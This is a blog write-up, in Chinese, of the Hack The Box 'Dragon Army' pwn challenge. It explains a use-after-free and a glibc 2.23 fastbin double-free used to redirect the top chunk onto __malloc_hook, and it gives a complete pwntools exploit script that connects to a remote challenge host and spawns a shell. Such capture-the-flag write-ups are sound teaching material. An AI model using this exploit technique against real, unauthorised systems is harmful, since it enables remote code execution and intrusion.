HTB pwn Dragon Army

已于 2024-02-23 22:35:42 修改
阅读量529 收藏 7
点赞数 11
文章标签: 安全 python 网络安全 pwn 汇编 hackthebox
于 2024-02-23 22:30:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62172019/article/details/136264417
版权
本文详细描述了一种利用alloca函数引发的栈区溢出漏洞,通过精心设计的输入策略,包括UAF和对topchunk地址的修改,最终实现对malloc_hook的控制并获取shell。作者提供了Python脚本来演示这一过程。
摘要由CSDN通过智能技术生成

逆向分析

在这里插入图片描述
程序使用了alloca函数扩大了栈区
在这里插入图片描述
此处可以泄露libc的地址
程序主要功能在下面

  while ( 1 )
  {
    while ( 1 )
    {
      fflush(stdin);
      fflush(_bss_start);
      fprintf(_bss_start, "\n%sDragons: [%d/%d]%s\n\n", "\x1B[1;34m", v5, 13LL, "\x1B[1;37m");
      fwrite(&unk_20C8, 1uLL, 0xEFuLL, _bss_start);
      fflush(stdin);
      fflush(_bss_start);
      num = read_num();
      if ( num == 1 )
        break;
      if ( num != 2 )
      {
        fwrite("\nFarewell..", 1uLL, 0xBuLL, _bss_start);
        exit(1312);
      }
      fwrite("\nDragon of choice: ", 1uLL, 0x13uLL, _bss_start);
      fflush(stdin);
      fflush(_bss_start);
      size = read_num();
      if ( size >= v5 )
      {
        fprintf(_bss_start, "\n%s[-] Unavailable dragon!%s\n", "\x1B[1;31m", "\x1B[1;34m");
      }
      else
      {
        free(s[size]);//存在UAF
        fprintf(_bss_start, "\n%s[+] The dragon flies away!\n%s", "\x1B[1;32m", "\x1B[1;34m");
      }
    }
    if ( v5 > 0xC )
    {
      fprintf(_bss_start, "\n%s[-] No more summons!\n\n%s", "\x1B[1;31m", "\x1B[1;34m");
      exit(22);
    }
    fwrite("\nDragon's length: ", 1uLL, 0x12uLL, _bss_start);
    fflush(stdin);
    fflush(_bss_start);
    size = read_num();
    fflush(stdin);
    fflush(_bss_start);
    if ( (size > 0x58 || size <= 1) && (size <= 0x68 || size > 0x78) )//关于size为什么要这样设定在下面解释
    {
      fprintf(_bss_start, "\n%s[-] Invalid dragon length!%s\n", "\x1B[1;31m", "\x1B[1;34m");
    }
    else
    {
      v10 = (char *)malloc(size);
      s[v5] = v10;
      if ( s[v5] )
      {
        fflush(stdin);
        fflush(_bss_start);
        fwrite("\nName your dragon: ", 1uLL, 0x13uLL, _bss_start);
        fflush(stdin);
        fflush(_bss_start);
        fgets(s[v5], size, stdin);
        fflush(stdin);
        fflush(_bss_start);
        ++v5;
      }
      else
      {
        fprintf(_bss_start, "\n%s[-] Something went wrong!%s\n\n", "\x1B[1;31m", "\x1B[1;34m");
      }
    }

漏洞分析

执行strings libc.so.6 | grep ubuntu
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0(库版本2.23)
在2.23我们熟悉的是利用fastbin UAF 写入malloc_hook上面的fake_fastbin地址然后申请(0x58,0x68]大小的块往malloc_hook写one_shot拿到权限。
但是吧,本题在size上面设置了限制使得我们不能直接一步到位。
那怎么办呢?
其实归根到底中心思想是伪造fastbin块没有变,转换一下思路如果我们可以修改topchunk的地址为malloc_hook附近且保证其大小合法(在malloc_hook - 36就合适)。
因为topchunk地址存在main_arena+96的地方所以我们要利用UAF将一个合法的大小放到main_arena上面
在这里插入图片描述
在这里插入图片描述

summon(0x28,b'a')
summon(0x28,b'a')
free(5)
free(6)
free(5)
summon(0x28,p64(0x61))
summon(0x28,p64(0x61))
summon(0x28,p64(0x61))

如图通过不断覆写0x61达到目的。

summon(0x58,b'\x00' * 64 + p64(malloc_hook - 36))

接下来把伪造好的块拿出来(main_arena + 0x10)将topchunk改掉。
之后就可以快乐的把malloc_hook申请出来改写了。

解题脚本

from pwn import *
def gd():
 gdb.attach(p)
 pause()
def summon(size,data):
 p.recvuntil(b'>> ')
 p.sendline(b'1')
 p.recvuntil(b': ')
 p.sendline(str(size).encode()) 
 p.recvuntil(b': ')
 p.sendline(data)
def free(idx):
 p.recvuntil(b'>> ')
 p.sendline(b'2')
 p.recvuntil(b': ')
 p.sendline(str(idx).encode()) 
#p = process("./da")
p = remote('94.237.53.58',56788)
libc = ELF("./glibc/libc.so.6")
p.recvuntil(b': ')
p.send(b'r3dDr4g3nst1str0f1' + b'a' * 38)
p.recvuntil(b'a' * 38)
libc_base = u64(p.recv(6).ljust(8,b'\x00')) - 0x6eab9
print(hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook'] -36
main_arena = libc_base + libc.sym['main_arena']
one_shot = libc_base + 0xe1fa1
summon(0x58,b'a')
summon(0x58,b'a')
free(0)
free(1)
free(0)
summon(0x58,p64(main_arena + 0x10))
summon(0x58,p64(main_arena + 0x10))
summon(0x58,p64(main_arena + 0x10))
summon(0x28,b'a')
summon(0x28,b'a')
free(5)
free(6)
free(5)
summon(0x28,p64(0x61))
summon(0x28,p64(0x61))
summon(0x28,p64(0x61))

summon(0x58,b'\x00' * 64 + p64(malloc_hook))
summon(0x48,b'a' * 20 + p64(one_shot))

p.interactive()

成功getshell
在这里插入图片描述
在这里插入图片描述

萌の鱼
关注
黑客入门,从HTB开始
neal1991的专栏
10-20 4万+
Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场。 之前在 HTB 也玩过一些机器。里面的机器难度有好几个档次,insane 难度的一般都是极其困难的,这种机器一般让我对着大神的 Writeup 我可能都没有办法复现出来。之前也有在公众号上分享过几篇 H...
HTB pwn Evil Corp
qq_62172019的博客
02-15 714
HTB pwn Evil Corp
pwn入门&&HTB_You know 0xDiablos例题讲解
网络安全学习
03-17 807
pwn题0基础讲解,看不懂来砍我
htb:Starting Point
LainWith的博客
10-19 1493
第0层部分靶机免费,部分靶机收费。由于这部分太过简单,因此一笔带过。 第一关Meow是telnet靶场:https://www.bilibili.com/video/BV1nS4y137GQ 第二关Fawn是ftp靶场:https://www.bilibili.com/video/BV11F41147Kf 第三关Dancing是SMB靶场:https://www.bilibili.com/video/BV1nS4y137vm 第四关Redeemer是Redis靶场:https://www.theethica
HTB pwn Bad grades&Restaurant
qq_62172019的博客
02-20 461
HTB pwn Bad grades&Restaurant
HTB-BoardLight靶机笔记
LINGX5的博客
08-18 825
HTB的靶机BoardLight靶机地址:https://app.hackthebox.com/machines/BoardLight通过nmap扫描发现目标靶机开启了22,80端口对80端口的http服务进行了目录爆破和子域名爆破,发现了doblarr的cms框架,通过google搜索,找到了 Exploit-for-Dolibarr-17.0.0-CVE-2023-30253漏洞的利用脚本。通过利用cms的漏洞成功获得shell,通过对配置的阅读,发现了一组凭据!,成功获得了用户的shell。
分类流控qdisc之htb
九天小哥的专栏
11-06 1921
文章目录tc参数配置示例算法思想用户态实现数据结构htb全局配置参数: tc_htb_globhtb类配置参数: tc_htb_optqdisc配置参数解析: htb_parse_opt()class配置参数解析: htb_parse_copt()内核实现数据结构qdisc操作集私有数据: htb_schedhtb类结构: htb_classqdisc操作集: htb_qdisc_ops初始化: htb_init()qdisc类操作集: htb_class_opschange()回调: htb_change
HTB靶机:RainyDay
LainWith的博客
11-27 1762
系统:linux难度:困难发布日期:2022/10/16其他信息:2022年10月24日靶场删除了泄露的root的 SSH 密钥,并更改了泄露的root密码。个人打靶发现靶机还删除了python,其他变化尚未发现。补充:这台靶机与Vulnhub靶机较为相似,只是利用起来更复杂很多。
HTB WP】Archetype
Pz_mstr's Blog
02-03 416
Hack the box - Archetype WP
htb
02-18
【标题】:“htb”通常指的是“Hack The Box”,这是一个在线平台,专注于网络安全教育,特别是渗透测试和道德黑客技能的提升。在这个平台上,用户可以挑战各种虚拟机(VMs),这些VM代表了不同级别的安全防护,模拟...
write-ups:来自CTF和HTB演练的文章
03-21
在IT行业中,特别是网络安全领域,CTF(Capture The Flag)和HTB(Hack The Box)是两种非常流行的技能提升和实战演练方式。CTF比赛通常涉及多种技术挑战,包括密码学、取证分析、二进制漏洞利用、网络渗透以及Web...
HTB
02-12
HTB
htb21-reg:htb 2021注册引擎
05-20
HTB 7注册门户 什么? 这是一个允许compsoc委员会成员使用我们现有的google admin平台登录内部应用程序的工具。 为什么? 这使我们可以极大地减少启动新应用程序的开销,因为我们可以将帐户管理移交给长期受苦的...
HTB setup script-开源
05-02
HTB.init是从CBQ.init派生的Shell脚本,它允许在Linux上轻松设置基于HTB的流量控制。 HTB(分层令牌桶)是一种新的排队规则,它试图解决当前CBQ实施中的弱点。
Spring Boot视频网站:安全与可扩展性设计
最新发布
2401_85702623的博客
10-16 580
本次程序开发选用的数据库管理工具是MySQL数据管理工具,使用它存放数据也需要创建程序对应的数据库文件,并命名刚创建的数据库文件,有了数据库也需要创建各种数据表来充实数据库,在数据表的创建中,不仅需要对数据表命名,也需要对数据表的字段进行设计,包括每个数据表里面需要设置的字段名称,字段对应的数据类型信息,字段的主键设置这个也是不可缺少的,因为每个数据表里面的主键就是标记着这个数据表跟其他数据表相区分的唯一标志。addtime timestamp 否 CURRENT_TIMESTAMP 创建时间。
CTFHUB技能树之HTTP协议——响应包源代码
weixin_73049307的博客
10-13 272
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
Gin框架操作指南08:日志与安全
技术卷的博客
10-16 453
本节演示日志与安全相关的API,包括定义路由日志的格式;如何记录日志;安全页眉;使用BasicAuth中间件;使用HTTP方法。
【WEB应用安全测试指南–蓝队安全测试2】--超详细-可直接进行实战!!!亲测-可进行安全及渗透测试
Dreams°的博客
10-10 2073
任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下 web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过任意文件下载漏洞可以获取系统文件及服务器的配置文件等等。一般来说,他们利用服务器 API、文件标准权限进行攻击。严格来说,任意文件下载漏洞并不是一种 web漏洞,而是网站设计人员的设计“漏洞”
[漏洞挖掘与防护] 04.Windows系统安全缺陷之5次Shift漏洞启动计算机机理分析
杨秀璋的专栏
10-16 18
上一篇文章详细介绍了WinRAR漏洞(CVE-2018-20250),并复现了该漏洞和讲解了恶意软件自启动劫持原理。这篇文章将分享Windows系统漏洞,通过5次Shift漏洞重改CMD,最终实现修改计算机密码并启动计算机,其思路还是比较有趣的,希望对您有所帮助!基础性文章,希望对入门的同学有帮助。
ROS双线HTB流控配置手册:保障游戏体验
"ROS双线HTB操作手册" ROS双线HTB(Hierarchical Token Bucket,层次化令牌桶)是一种高级的流量整形技术,用于在RouterOS操作系统中实现精细化的网络带宽管理。此手册主要针对如何在双线环境中,如电信和联通线路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值